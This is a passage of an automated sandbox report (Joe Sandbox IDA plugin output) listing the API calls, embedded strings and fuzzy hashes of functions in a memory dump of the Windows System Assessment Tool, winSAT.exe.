                                                                                                                                                                                              • Opcode Fuzzy Hash: 782be181f8592520a654ec4ba99b35b2eb9fff8b28a7ab140bcd35295ad2ad23
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15616D60E0D64295FB60BB11F85027AEB50BF85788FF8A035D94E027E1CEADB454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$FormatFreeLoadMessageStringType
                                                                                                                                                                                              • String ID: H$INFO: cannot find message for Win32 error %u$Wininet.dll$base\winsat\exe\logging.cpp$netmsg.dll
                                                                                                                                                                                              • API String ID: 270474373-3627440521
                                                                                                                                                                                              • Opcode ID: 69f183a88fc5718d08238e4e637c98c5982bd811d2ed09e00ccbf1a21da30ccc
                                                                                                                                                                                              • Instruction ID: c4de3a1a1370e323505dcb629fde39002fe63d86e8658a35f8e5c507d1549c0b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f183a88fc5718d08238e4e637c98c5982bd811d2ed09e00ccbf1a21da30ccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF317E2260C69183E760AF11E8043BEFA91FB84BA4FA58635CA8D477D4DF7CE545C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00007FF780FD72A7
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000030,00007FF780FA03B3), ref: 00007FF780FD72EB
                                                                                                                                                                                                • Part of subcall function 00007FF780FA96E0: LoadLibraryExA.KERNEL32 ref: 00007FF780FA9740
                                                                                                                                                                                                • Part of subcall function 00007FF780FA96E0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FF780F9A505), ref: 00007FF780FA9786
                                                                                                                                                                                                • Part of subcall function 00007FF780FA96E0: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00007FF780F9A505), ref: 00007FF780FA97FA
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000030,00007FF780FA03B3), ref: 00007FF780FD73A0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEventLibrary$CloseCountCurrentFormatFreeLoadMessageOpenProcessQueryTickValue_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSATAPI$TaskErrorCount$The error count is zero becuase the TaskErrorCount value does not exist.$base\winsat\common\winsatutilities.cpp$cannot access the winast API registry key; %u %s$cannot access the winast TaskErrorCount API registry value; %u %s
                                                                                                                                                                                              • API String ID: 4085292852-3670254411
                                                                                                                                                                                              • Opcode ID: f36afb1bc73f1c02f9be7f336770e1f64464e0b4a6580bb76c84017912defc67
                                                                                                                                                                                              • Instruction ID: f187ace5dedb7a088727e5b50639a492680a83e5ae90e9b61a235ad92eccc2a8
                                                                                                                                                                                              • Opcode Fuzzy Hash: f36afb1bc73f1c02f9be7f336770e1f64464e0b4a6580bb76c84017912defc67
                                                                                                                                                                                              • Instruction Fuzzy Hash: F541833571CB8292E750AB51E8841AAF7A4FB98750FE09231EE8D03B94EF7CE505CB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide$Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3672326914-0
                                                                                                                                                                                              • Opcode ID: 82c48a35b7920db008f950404d87549f172c379e0a5da5641d99b65fd0b0a73f
                                                                                                                                                                                              • Instruction ID: 00942e520fff7900e7a68861eabbb309eb771937a3e68805ce425ad08bfeb392
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82c48a35b7920db008f950404d87549f172c379e0a5da5641d99b65fd0b0a73f
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7918E37A08B8596EB699F16E9402ADB7A0FB89B94FA49131DB4D43794CF38F470C710
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$memcpy
                                                                                                                                                                                              • String ID: A failure occured while resetting history.$A failure occured while resetting write history.$HistoryVersionWrite$Machine already has a WinEI rating. Rerunning all assessments ...$Machine already has a WinEI rating. Rerunning all assessments ... $base\winsat\exe\main.cpp$clean$never$restart
                                                                                                                                                                                              • API String ID: 240754450-2095427325
                                                                                                                                                                                              • Opcode ID: fadbc2bcc4c2da98e617a4a017fa33523133907ef1e72d946003ab26a1aed016
                                                                                                                                                                                              • Instruction ID: 1a55987824c981b5507ae1fb159139e608d61b132ff994b24d422a052630f983
                                                                                                                                                                                              • Opcode Fuzzy Hash: fadbc2bcc4c2da98e617a4a017fa33523133907ef1e72d946003ab26a1aed016
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A514B61A1C64391FF44FB11E8512B9A760BF90354FE09036E94E866EAEF6CF54AC720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentPriority$Thread$ClassProcess$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2414731974-0
                                                                                                                                                                                              • Opcode ID: d215e296768f0f995cad51675aab21ab80491c043c38e87d3093ebc4311003cb
                                                                                                                                                                                              • Instruction ID: fd715932eaef7310488c84332e4997920375cdbd2ea399cfb99d65d87b8a0fab
                                                                                                                                                                                              • Opcode Fuzzy Hash: d215e296768f0f995cad51675aab21ab80491c043c38e87d3093ebc4311003cb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C515E26A0D68286EB50FB15A4147BAAB60FB99B55FE19031CA4E43396DF3CE044C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 432778473-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memchr$localeconvstrcspn
                                                                                                                                                                                              • String ID: 0$e
                                                                                                                                                                                              • API String ID: 2307473258-387598579
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF54E
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF5B3
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF603
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF6A5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType
                                                                                                                                                                                              • String ID: -$/
                                                                                                                                                                                              • API String ID: 4177115715-2515390558
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FEDC64: _aligned_malloc.MSVCRT ref: 00007FF780FEDCA5
                                                                                                                                                                                                • Part of subcall function 00007FF780FEDC64: InitializeSListHead.KERNEL32 ref: 00007FF780FEDCBD
                                                                                                                                                                                                • Part of subcall function 00007FF780FEDC64: CreateEventW.KERNEL32 ref: 00007FF780FEDD00
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 00007FF780FF0CC5
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 00007FF780FF0D01
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: GetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0872
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: RegCloseKey.ADVAPI32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0891
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: SetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE08A4
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$EnabledErrorHandleLastModule$CloseCountCreateCurrentHeadInitializeListProcessTick_aligned_malloc_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: A value other than 0 or 1 found in CCCSupportDisabled, using default value of %d for CCC Enabled$CCC Support disabled in registry$CCC Support not disabled in registry$CCCSupportDisabled$PermittedBGInterference$base\winsat\storage\diskprof.cpp
                                                                                                                                                                                              • API String ID: 2006971136-2743305029
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 00007FF780F97673
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F9788C
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F978A3
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$EnabledEventExceptionHandleModuleThrow__uncaught_exception$CountCurrentFindLoadLockProcessSizeofTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: $ERROR: %#08X mlib::XmlDOM::LoadDocument(schema) failed.$ERROR: %#08X mmlib::XmlDOM::ValidateXml failed.$WinsatSchema.xsd$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 851945222-1334996330
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule$CountTick
                                                                                                                                                                                              • String ID: CompletionStatus$WinSAT$description
                                                                                                                                                                                              • API String ID: 1594003039-2016456358
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FD5E28: SHGetFolderPathW.SHELL32 ref: 00007FF780FD5E70
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000400,00000000), ref: 00007FF780FD5F94
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000400,00000000), ref: 00007FF780FD5FAE
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorFileFolderLastPath
                                                                                                                                                                                              • String ID: \\.\%C:
                                                                                                                                                                                              • API String ID: 3540804360-3735155761
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: first not in the string$last < first
                                                                                                                                                                                              • API String ID: 3934552184-3835420288
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot select a XML node for from an XPATH expression
                                                                                                                                                                                              • API String ID: 0-3702432899
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCurrentHandlePriorityThread$ClassErrorLastProcess
                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                              • API String ID: 3412941295-2564639436
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Value$CloseCreateFlushQuery
                                                                                                                                                                                              • String ID: ?$MOOBE$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 1909893835-1736852685
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$TimerWaitable
                                                                                                                                                                                              • String ID: Cannot set the assessment watch dog timer$Dying - Cannot set the assessment watch dog timer$Dying - Invalid value for short watch dog timer$Invalid value for short watch dog timer$base\winsat\exe\watchdog.cpp
                                                                                                                                                                                              • API String ID: 627813652-3218367002
                                                                                                                                                                                              • Opcode ID: a9f309908c350da5e646e4d223a96f7f63b0c43e5216d6ecf335d1363b53af3d
                                                                                                                                                                                              • Instruction ID: f4e959a973c1e3d5678e53013629b40727cb311acd39378b3092c063c50c2e98
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9f309908c350da5e646e4d223a96f7f63b0c43e5216d6ecf335d1363b53af3d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C213821E1C94782E754BB60E8697B9E760BF81745FF08232D80E426A1DFBDF406CB21
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CloseCountCreateCurrentFlushProcessTickValue_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ?$ERROR: could not create %ws reg key. error = %u$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 2380191356-345777767
                                                                                                                                                                                              • Opcode ID: 2123ee1d3b54ccaafa7b3b99ee88ea041357c1a574fe6db0f8d82ab7cca43dd7
                                                                                                                                                                                              • Instruction ID: 48c3b1c662815c9d070eedbd9558d6afb250ba78017f1c1dabb4f4bd92c312e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2123ee1d3b54ccaafa7b3b99ee88ea041357c1a574fe6db0f8d82ab7cca43dd7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7214A32618B4187EB109F20E84477ABBA4FB89BA4FA14231DA9D47764CF7CD589CB14
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fwprintf
                                                                                                                                                                                              • String ID: <ProgrammaticName>%ws</ProgrammaticName>$ <Value>%lld</Value>$ </MetricValue>$ <MetricValue>
                                                                                                                                                                                              • API String ID: 968622242-1868502295
                                                                                                                                                                                              • Opcode ID: c10b7d38776a473ee28b68158cf4e1dcf868e2ac7480662c3b599e2f6d25e355
                                                                                                                                                                                              • Instruction ID: e41197b4f5eac8d43606cdaf13b6521d5d1783d6716842739d89656653a2c0db
                                                                                                                                                                                              • Opcode Fuzzy Hash: c10b7d38776a473ee28b68158cf4e1dcf868e2ac7480662c3b599e2f6d25e355
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF0DA31A08B86C6E7105B15F840069EB60FF49FD1BE59170DA0907718DFB8D145CB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: EnterCriticalSection.KERNEL32 ref: 00007FF780FDC9DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LeaveCriticalSection.KERNEL32 ref: 00007FF780FDCA0D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: vswprintf_s.MSVCRT ref: 00007FF780FDCA34
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F94D24
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$CriticalSection__uncaught_exception$EnterExceptionFindHandleLeaveLoadLockModuleSizeofThrow_wtofiswdigitvswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h$cached$forever$justcores$maxt$mint$notnice$uncached
                                                                                                                                                                                              • API String ID: 493481623-792068495
                                                                                                                                                                                              • Opcode ID: 45677b5c72cd49136a876fcfbf08342032e959517ced32fe4e19bad8488d563a
                                                                                                                                                                                              • Instruction ID: b930f3c1c48f4f0e233274c5ea0a0a3eaa593338b95244bbd89a2c37d2746430
                                                                                                                                                                                              • Opcode Fuzzy Hash: 45677b5c72cd49136a876fcfbf08342032e959517ced32fe4e19bad8488d563a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D1B122A0CA829AEB14FF21C4101E9A761FF51798FA09132DA0D47BD6DF2DF566C360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide$Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3672326914-0
                                                                                                                                                                                              • Opcode ID: 28a9832999819af3201d97c93aa3843ee96b6fb6fe0125b4f0448d58416e171a
                                                                                                                                                                                              • Instruction ID: edba17a6d0c3cb0d124f39ceb8d755e4f71b2430109c5f94d471cf152c4d74dd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 28a9832999819af3201d97c93aa3843ee96b6fb6fe0125b4f0448d58416e171a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92B18D36608B8586EB50EF26D4413ADB7A0FB89F98FA49132DE4D47798CF38E454C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountInfoStringSystemTickType
                                                                                                                                                                                              • String ID: ERROR Cannot enable logging becuase the the WinSAT directory cannot be determined$ERROR: Cannot start ETW tracing; %s$WinSATSession%u$\DataStore\%04d-%02d-%02d %02d.%02d.%06.3f.winsat.etl$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 2047934861-2951745245
                                                                                                                                                                                              • Opcode ID: d16b25315d6b87577e5c7b26a4137971e0f7868615d898ce74960aaa2d60d9e7
                                                                                                                                                                                              • Instruction ID: fa7d0e3768467c3f19d15c0574a953fd5fd10e38a5648bf7bdbc9415c0c75d45
                                                                                                                                                                                              • Opcode Fuzzy Hash: d16b25315d6b87577e5c7b26a4137971e0f7868615d898ce74960aaa2d60d9e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D71A372608B8286EB10EF21E4403ADB7A0FB85B54FA09235DB4D53BA5DF7CE465CB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: s is null$slen is equal to npos
                                                                                                                                                                                              • API String ID: 3934552184-3164880081
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: s is null$slen is equal to npos
                                                                                                                                                                                              • API String ID: 3934552184-3164880081
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseOpenQueryValue
                                                                                                                                                                                              • String ID: MaxWinSATFiles
                                                                                                                                                                                              • API String ID: 772312138-2433871838
